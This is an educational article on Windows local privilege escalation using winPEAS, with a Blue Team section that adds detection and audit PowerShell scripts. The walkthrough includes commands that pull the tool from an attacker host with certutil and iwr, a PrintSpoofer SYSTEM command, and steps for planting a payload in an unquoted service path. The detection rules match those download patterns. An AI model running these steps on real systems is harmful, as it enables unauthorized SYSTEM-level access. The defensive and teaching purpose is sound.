Introduction / Overview
Local privilege escalation on Windows almost always begins with enumeration. Before you reach for an exploit, you need a clear map of misconfigurations: weak service permissions, unquoted service paths, abusable autoruns, stored credentials, and missing patches. winPEAS (Windows Privilege Escalation Awesome Scripts) is the de facto enumeration tool for this phase, part of the PEASS-ng project.
In this article you'll learn how to run winPEASx64.exe on a target, interpret its color-coded output, and focus on three high-value findings: privilege checks, unquoted service paths, and autorun scans. Equally important, the Blue Team section shows how defenders detect and shut down these exact paths.
Ethical & Legal Disclaimer: This material is for education and authorized testing only. Run these techniques exclusively on systems you own or have explicit written permission to assess (e.g., an OSCP lab, an HTB/THM box, or a scoped engagement). Unauthorized access to computer systems is a crime in virtually every jurisdiction.
How It Works / Background
winPEAS is not an exploit. It is a high-speed read-only collector that queries the Windows API, the registry, WMI, and the filesystem, then ranks findings by exploitability. The output is color-coded:
- Red/Yellow highlight — almost certainly exploitable (e.g., a writable service binary).
- Green — currently configured / baseline information.
- Blue — informational user/group context.
Three classes of findings deserve special attention:
- Privilege check — Enumerates the current token's privileges via GetTokenInformation. Privileges like SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, or SeBackupPrivilege are directly abusable (the "Potato" family of attacks abuses impersonation).
- Unquoted service path — Windows services whose ImagePath contains spaces but no quotes. The Service Control Manager parses the path left-to-right, so C:\Program Files\My App\svc.exe may resolve to C:\Program.exe first if an attacker can write there.
- Autorun scan — Registry Run/RunOnce keys, Startup folders, and scheduled tasks pointing at binaries an unprivileged user can overwrite.
Prerequisites / Lab Setup
- A foothold with a low-privilege shell on a Windows target (Windows 10/11 or Server 2016+).
- The winPEASx64.exe binary (use x64 on 64-bit hosts; an obfuscated .bat variant exists for AV-heavy environments).
- A way to transfer the binary: an HTTP listener on the attacker host plus certutil or PowerShell on the target.
Grab the latest release:
# On the attacker machine
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe
python3 -m http.server 8000
Transfer to the target:
# On the target (low-priv shell)
certutil.exe -urlcache -split -f "http://10.10.14.5:8000/winPEASx64.exe" C:\Windows\Temp\wp.exe
# or, in-memory friendly:
iwr http://10.10.14.5:8000/winPEASx64.exe -OutFile C:\Windows\Temp\wp.exe
Attack Walkthrough / PoC
1. Run the full scan
C:\Windows\Temp\wp.exe > C:\Windows\Temp\wp.txt
For a focused, faster run you can pass categories. Useful flags include systeminfo, userinfo, servicesinfo, and quiet (suppress the banner). Use log to write to a file directly, and cmd to also run extra commands:
# Only the services section, with the banner suppressed
C:\Windows\Temp\wp.exe quiet servicesinfo
2. Privilege check
Look for the Current Token privileges block. A typical exploitable result on a service account:
SeImpersonatePrivilege Enabled
SeAssignPrimaryTokenPrivilege Enabled
You can confirm the same data natively:
whoami /priv
If SeImpersonatePrivilege is Enabled, the host is a candidate for a Potato-style attack (PrintSpoofer, GodPotato, or RoguePotato), which coerce a privileged process into authenticating to a named pipe you control and let you impersonate NT AUTHORITY\SYSTEM:
.\PrintSpoofer64.exe -i -c cmd.exe
3. Unquoted service path
winPEAS flags these under the services section with a yellow highlight. Verify manually:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
Suppose winPEAS reports:
"VulnService" -> C:\Program Files\Vuln Service\service.exe (Unquoted and Space detected)
If you have write permission to C:\ or C:\Program Files\, drop a malicious Program.exe or Vuln.exe. Always confirm the write permission first:
icacls "C:\Program Files\Vuln Service"
If a writable directory sits earlier in the path, place your payload and restart the service (or wait for a reboot):
copy payload.exe "C:\Program Files\Vuln.exe"
sc stop VulnService & sc start VulnService
The service runs as LocalSystem, so your payload inherits SYSTEM. Note that the unquoted path alone is not enough — the writable directory in the path is the actual vulnerability.
4. Autorun scan
winPEAS enumerates autoruns from the registry and Startup folders. Cross-check the Run key and its permissions:
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
icacls "C:\Program Files\Autorun App\autorun.exe"
If an autorun binary or its registry value is writable by your user and the next logon is performed by an admin, replacing the binary yields code execution in that admin's context. This is closely related to the broader Windows service exploitation patterns you may already know.
Attack Flow Diagram

Diagram: a foothold leads to winPEAS enumeration, whose highlighted findings branch into impersonation, unquoted-path, or autorun abuse — all converging on SYSTEM.
Detection & Defense (Blue Team)
Enumeration tools are noisy. Defenders have multiple layers to catch and prevent each step.
Detect the enumeration itself. winPEAS triggers hundreds of registry, WMI, and service queries in seconds. EDR products commonly flag winPEASx64.exe by hash and behavior. Map activity to MITRE ATT&CK techniques T1057 (Process Discovery), T1082 (System Information Discovery), and T1518 (Software Discovery). Enable PowerShell Script Block Logging (Event ID 4104) and command-line process auditing (Event ID 4688) to capture certutil downloads and the binary launch.
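The detection logic described above, as an added example that is not part of the article or of PEASS-ng: a small set of rules for the download-and-launch pattern this walkthrough uses (certutil -urlcache, iwr -OutFile, a PEASS-ng binary name or its bare-word arguments), a function that scores a command line against them, and a reader that pulls Security 4688 (or PowerShell 4104) events and applies the same rules. The rule names, the sample command lines and the function names are constructed for this example; the event field names (CommandLine, SubjectUserName, NewProcessName, ScriptBlockText) are the ones Windows writes into the event XML.

```powershell
# Added detection helper (not from the article or PEASS-ng).
# Requires "Include command line in process creation events" for 4688 and
# Script Block Logging for 4104; without those the fields are empty.
# A renamed binary (wp.exe) defeats the name rule, so the download and
# argument rules carry the weight. -match is case-insensitive by default.
$DetectionRules = @(
    @{ Name = 'certutil_download'; Pattern = 'certutil(\.exe)?\s+.*-urlcache\s+.*-f\s+"?https?://' },
    @{ Name = 'ps_download_exe';   Pattern = '(invoke-webrequest|iwr|wget|curl)\s+.*-outfile\s+\S+\.exe' },
    @{ Name = 'peass_name';        Pattern = 'winpeas|peass-ng' },
    # winPEAS takes bare-word switches; "<something>.exe quiet|systeminfo|..." is unusual elsewhere
    @{ Name = 'peass_args';        Pattern = '\S+\.exe\s+(quiet|systeminfo|userinfo|servicesinfo)(\s|$)' }
)

function Test-CommandLine {
    param([string]$CommandLine)
    # Returns the names of every rule the command line trips (empty array if none).
    @($DetectionRules | Where-Object { $CommandLine -match $_.Pattern } | ForEach-Object { $_.Name })
}

function Get-SuspiciousEvents {
    param(
        [string]$LogName = 'Security',
        [int]$Id = 4688,
        [string]$Field = 'CommandLine',   # use 'ScriptBlockText' with 'Microsoft-Windows-PowerShell/Operational' and Id 4104
        [int]$MaxEvents = 5000
    )
    Get-WinEvent -FilterHashtable @{ LogName = $LogName; Id = $Id } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Read fields by name from the event XML instead of relying on positional indexes.
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            if (-not $data[$Field]) { return }            # field not logged: skip this event
            $hits = Test-CommandLine -CommandLine ([string]$data[$Field])
            if ($hits.Count -gt 0) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    User    = $data['SubjectUserName']
                    Process = $data['NewProcessName']
                    Rules   = ($hits -join ',')
                    Text    = $data[$Field]
                }
            }
        }
}

# Constructed sample command lines (the first three mirror the article's transfer and launch steps).
$SampleCommandLines = @(
    'certutil.exe -urlcache -split -f "http://10.10.14.5:8000/winPEASx64.exe" C:\Windows\Temp\wp.exe',
    'powershell.exe iwr http://10.10.14.5:8000/winPEASx64.exe -OutFile C:\Windows\Temp\wp.exe',
    'C:\Windows\Temp\wp.exe quiet servicesinfo',
    'C:\Windows\System32\svchost.exe -k netsvcs -p'     # benign control line
)
foreach ($line in $SampleCommandLines) {
    '{0,-32} {1}' -f (($line -split ' ')[0]), ((Test-CommandLine -CommandLine $line) -join ',')
}

# Live use on a host with the auditing above enabled:
# Get-SuspiciousEvents | Format-Table -AutoSize
# Get-SuspiciousEvents -LogName 'Microsoft-Windows-PowerShell/Operational' -Id 4104 -Field ScriptBlockText
```

On the constructed lines the certutil and iwr entries trip both their download rule and the name rule (the URL still contains winPEASx64.exe), the renamed wp.exe launch is caught only by the argument rule, and the svchost line trips nothing. That is the point of keeping several weak rules: each one alone is evadable, together they cover the transfer-then-run sequence the article walks through.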
Fix unquoted service paths (T1574.009). Audit all services and enclose paths in quotes:
Get-CimInstance Win32_Service |
Where-Object { $_.PathName -notmatch '^"' -and $_.PathName -match ' ' -and $_.PathName -notmatch '^C:\\Windows' } |
Select-Object Name, PathName
Remediate by quoting the ImagePath and removing write access from non-admins on every directory in the path (C:\, C:\Program Files\ should not be user-writable by default — verify nobody loosened them).
Neutralize impersonation abuse (T1134). SeImpersonatePrivilege is required by legitimate service accounts (IIS, SQL), so you can't simply remove it. Instead, keep hosts patched (RoguePotato/RPC coercion paths are mitigated on current builds), restrict which accounts run as service identities, and apply gMSA with least privilege. Monitor for named-pipe creation followed by token manipulation.
Lock down autoruns (T1547.001). Baseline HKLM\...\CurrentVersion\Run, RunOnce, and Startup folders, then alert on changes. Use icacls to ensure autorun targets are not writable by standard users, and apply AppLocker or WDAC so that only signed, approved binaries execute regardless of where they were dropped.
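The audit the three fixes above call for (unquoted service paths with a writable directory in the path, and Run/RunOnce/Startup entries whose target a standard user can overwrite), as an added example that is not part of the article or of PEASS-ng. It expands each unquoted path into the candidates the Service Control Manager would try, exactly as the background section describes, and checks every candidate's parent directory for write access by Everyone, Users, Authenticated Users or INTERACTIVE. The function names and the principal list are this example's own assumptions (the list uses English account names); run it from an elevated PowerShell.

```powershell
# Added audit script (not from the article or PEASS-ng). Run elevated.

# Principals whose write access on a directory, file or key counts as "loosened".
# Assumption: English account names; adjust on localized systems.
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Bit 0x2 is WriteData/CreateFiles on the filesystem and SetValue in the registry
# (FullControl, Modify and Write all include it); 0x40000000 / 0x10000000 are
# GENERIC_WRITE / GENERIC_ALL, which Get-Acl shows as raw numbers on some ACEs.
$WriteBits = 0x2 -bor 0x40000000 -bor 0x10000000

function Test-LowPrivWritable {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }   # Deny ACEs are ignored: this over-reports, never under-reports
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # FileSystemAccessRule exposes FileSystemRights, RegistryAccessRule exposes RegistryRights
        $rights = if ($ace.PSObject.Properties['FileSystemRights']) { [int]$ace.FileSystemRights } else { [int]$ace.RegistryRights }
        if (($rights -band $WriteBits) -ne 0) { return $true }
    }
    return $false
}

# The SCM tries every space-delimited prefix of an unquoted path as "<prefix>.exe"
# before it reaches the real executable, so each prefix is a hijack candidate.
function Get-ServicePathCandidates {
    param([Parameter(Mandatory)][string]$PathName)
    $parts = $PathName.Trim() -split ' '
    $exeIndex = -1
    for ($i = 0; $i -lt $parts.Count; $i++) {
        if ($parts[$i] -match '\.exe$') { $exeIndex = $i; break }
    }
    if ($exeIndex -lt 1) { return @() }        # no space before the executable: nothing to hijack
    for ($i = 1; $i -le $exeIndex; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'   # e.g. C:\Program.exe, C:\Program Files\Vuln.exe
    }
}

function Find-HijackableServicePaths {
    Get-CimInstance Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and $_.PathName -match ' ' } |
        ForEach-Object {
            $svc = $_
            foreach ($candidate in Get-ServicePathCandidates -PathName $svc.PathName) {
                $dir = Split-Path -Path $candidate -Parent
                if (Test-LowPrivWritable -Path $dir) {
                    [pscustomobject]@{
                        Service = $svc.Name; RunsAs = $svc.StartName; StartMode = $svc.StartMode
                        PathName = $svc.PathName; WritableDir = $dir; HijackPath = $candidate
                    }
                }
            }
        }
}

function Find-WritableAutoruns {
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
    )
    $providerProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    foreach ($key in $keys) {
        if (-not (Test-Path -LiteralPath $key)) { continue }
        if (Test-LowPrivWritable -Path $key) {     # a writable key lets a standard user add or retarget entries
            [pscustomobject]@{ Location = $key; Entry = '(key)'; Target = $null; Finding = 'key writable by standard users' }
        }
        foreach ($prop in (Get-ItemProperty -LiteralPath $key).PSObject.Properties) {
            if ($providerProps -contains $prop.Name) { continue }
            $value = [string]$prop.Value
            # Quoted path, or an unquoted path up to and including the first ".exe" token
            if ($value -match '^"([^"]+)"' -or $value -match '^(.+?\.exe)(\s|$)') {
                $exe = [Environment]::ExpandEnvironmentVariables($Matches[1])
                if (Test-LowPrivWritable -Path $exe) {
                    [pscustomobject]@{ Location = $key; Entry = $prop.Name; Target = $exe; Finding = 'binary writable by standard users' }
                }
            }
        }
    }
    # All-users Startup folder: anything placed here runs at every interactive logon.
    $startup = [Environment]::GetFolderPath('CommonStartup')
    if (Test-LowPrivWritable -Path $startup) {
        [pscustomobject]@{ Location = $startup; Entry = '(folder)'; Target = $null; Finding = 'Startup folder writable by standard users' }
    }
    Get-ChildItem -LiteralPath $startup -File -ErrorAction SilentlyContinue | ForEach-Object {
        if (Test-LowPrivWritable -Path $_.FullName) {
            [pscustomobject]@{ Location = $startup; Entry = $_.Name; Target = $_.FullName; Finding = 'startup item writable by standard users' }
        }
    }
}

Find-HijackableServicePaths | Format-Table -AutoSize
Find-WritableAutoruns       | Format-Table -AutoSize
```

Unlike the one-line filter earlier, which lists every unquoted path with a space, this reports only services where some candidate directory is actually writable, which is the condition the article identifies as the real vulnerability; an empty result for both functions means the fixes in this section are in place. Deny ACEs are deliberately not evaluated, so a false positive is possible, but a writable location is never missed.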
Reduce overall attack surface. Enforce least privilege, enable Credential Guard to limit harvestable secrets (also covered in Credential Dumping with Mimikatz), and run regular configuration audits so winPEAS finds nothing to highlight.
Conclusion
winPEAS turns the tedious, error-prone task of Windows enumeration into a fast, color-coded report. For privilege escalation, the three findings that most often lead to SYSTEM are abusable token privileges, unquoted service paths with a writable directory, and writable autorun binaries. The same output is a gift to defenders: every highlighted line is a concrete remediation item. Run the tool, but more importantly, run it against your own estate first and close the gaps before an adversary enumerates them for you.
References
- PEASS-ng (winPEAS) — https://github.com/peass-ng/PEASS-ng
- HackTricks — Windows Local Privilege Escalation — https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
- MITRE ATT&CK T1574.009 (Unquoted Path) — https://attack.mitre.org/techniques/T1574/009/
- MITRE ATT&CK T1134 (Access Token Manipulation) — https://attack.mitre.org/techniques/T1134/
- MITRE ATT&CK T1547.001 (Registry Run Keys / Startup Folder) — https://attack.mitre.org/techniques/T1547/001/
- PrintSpoofer — https://github.com/itm4n/PrintSpoofer